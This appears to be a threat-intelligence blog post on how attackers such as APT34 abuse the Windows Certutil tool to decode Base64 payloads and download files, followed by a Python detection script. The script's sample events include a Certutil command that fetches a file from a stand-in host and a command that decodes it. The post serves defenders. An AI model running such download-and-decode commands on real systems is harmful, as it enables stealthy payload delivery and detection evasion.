Certutil module #APT34


#Certutil_Concept
Many attacks in recent years, such as those by #APT34, have used the Certutil module, because Certutil has two features that are very attractive to hackers.

Certutil is a module designed by Microsoft for installing the customized certificates required on Windows operating systems, and it is installed by default on Windows.

The two features are these. First, Certutil can decode Base64-encoded values, so a payload can call Certutil instead of carrying a handwritten decoder, which suits a hacker very well. Second, the module can download a plain-text file via external DNS and save it for us.

The purpose of this post is not just to describe CertUtil, but to use this module as a pretext for focusing on the default services of Windows operating systems, which provide creative solutions for bypassing detection mechanisms.
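Both features described above leave a trace in process-creation logs, which is where a defender can look for them. The Python below is an added example, not code from the original post: it flags Certutil command lines that decode data or fetch a remote file, and ranks a host higher when both appear. The event format, host names, file paths and URL are constructed; the switch names are Certutil's own.

```python
import re
import shlex
from collections import defaultdict

DECODE = {"decode", "decodehex"}        # Base64 / hex decoding switches
DOWNLOAD = {"urlcache", "verifyctl"}    # switches that can fetch a remote file
URL_RE = re.compile(r"^(?:https?|ftp)://", re.IGNORECASE)

def classify(command_line):
    """Return the set of suspicious Certutil behaviours in one command line."""
    try:
        tokens = shlex.split(command_line, posix=False)  # keeps backslashes intact
    except ValueError:                                   # unbalanced quotes
        tokens = command_line.split()
    tokens = [t.strip('"') for t in tokens]
    if not tokens:
        return set()
    image = re.split(r"[\\/]", tokens[0])[-1].lower()
    if image not in ("certutil", "certutil.exe"):
        return set()
    # Certutil accepts "-switch" and "/switch", in any letter case.
    switches = {t[1:].lower() for t in tokens[1:] if len(t) > 1 and t[0] in "-/"}
    findings = set()
    if switches & DECODE:
        findings.add("decode")
    if switches & DOWNLOAD and any(URL_RE.match(t) for t in tokens[1:]):
        findings.add("download")
    return findings

def hunt(events):
    """Map host -> severity; a host showing both behaviours ranks highest."""
    seen = defaultdict(set)
    for event in events:
        seen[event["host"]] |= classify(event["cmdline"])
    return {host: ("high" if found == {"decode", "download"} else "medium")
            for host, found in seen.items() if found}

# Constructed process-creation events (hosts, paths and URL are made up).
SAMPLE_EVENTS = [
    {"host": "WS01", "cmdline": r'certutil.exe -urlcache -split -f http://files.example.test/a.txt C:\Users\Public\a.txt'},
    {"host": "WS01", "cmdline": r'"C:\Windows\System32\certutil.exe" /DECODE C:\Users\Public\a.txt C:\Users\Public\a.bin'},
    {"host": "WS02", "cmdline": r'certutil -addstore Root C:\certs\corp-root.cer'},
    {"host": "WS03", "cmdline": r'CertUtil -decode in.b64 out.dat'},
]

if __name__ == "__main__":
    for host, severity in sorted(hunt(SAMPLE_EVENTS).items()):
        print(host, severity)
```

Routine certificate work, such as the `-addstore` line on WS02, produces no finding, so the rule can sit alongside normal administrative use of the tool.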

About Post Author

Treadstone 71

@Treadstone71LLC Cyber intelligence, counterintelligence, Influence Operations, Cyber Operations, OSINT, Clandestine Cyber HUMINT, cyber intel and OSINT training and analysis, cyber psyops, strategic intelligence, Open-Source Intelligence collection, analytic writing, structured analytic techniques, Target Adversary Research, cyber counterintelligence, strategic intelligence analysis, estimative intelligence, forecasting intelligence, warning intelligence, threat intelligence